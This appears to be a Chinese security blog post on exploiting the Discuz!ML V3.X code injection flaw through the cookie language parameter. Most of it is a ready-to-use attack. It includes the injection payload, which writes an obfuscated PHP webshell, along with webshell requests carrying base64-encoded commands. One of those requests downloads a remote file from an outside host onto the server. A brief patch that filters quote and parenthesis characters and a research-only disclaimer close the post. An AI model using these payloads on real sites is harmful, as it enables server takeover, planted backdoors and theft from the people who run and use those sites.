点击蓝字 · 关注我们
此次shell利用了Discuz!ML V3.X 代码注入漏洞
在19年7月11日,Discuz!ML被发现存在一处远程代码执行漏洞,攻击者通过在请求流量的cookie字段中的language参数处插入构造的payload,进行远程代码执行利用,该漏洞利用方式简单,危害性较大。
漏洞url:http://www.xxxx.net.cn
0x01 payload
'.assert(system(urldecode('echo"<?php @$pi=base_convert%3b$pi=$pi(53179,10,36)^$pi(1109136,10,36)%3b${$pi}{0}(base64_decode(${$pi}{1}))%3b?>" > .%252fdata%252f1.php'))).'
0x02
直接在tSWa_2132_language参数后面添加payload,发送请求,通过回显发现请求成功。
0x03
测试1.php文件是否写入,将你想执行的命令进行base64编码。
0x04
访问http://www.xxxxxx.cn/data/1.php?0=assert&1=c3lzdGVtKCdscycp
0x05
http://www.xxxxxx.cn/data/1.php?0=assert&1=Y29weSgiaHR0cDovLzIwxxxxxxxxxxMDg4LzEudHh0IiwidGVzdC5waHAiKQ==
0x06
单看语言这个点:
在/source/class/discuz/discuz_application.php 第338行之后341行之前加入该代码暂缓此安全问题:
$lng = str_replace("(","",$lng);
$lng = str_replace(")","",$lng);
$lng = str_replace("'","",$lng);
$lng = str_replace('"',"",$lng);
$lng = str_replace('`',"",$lng);
EDI安全
扫二维码|关注我们
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论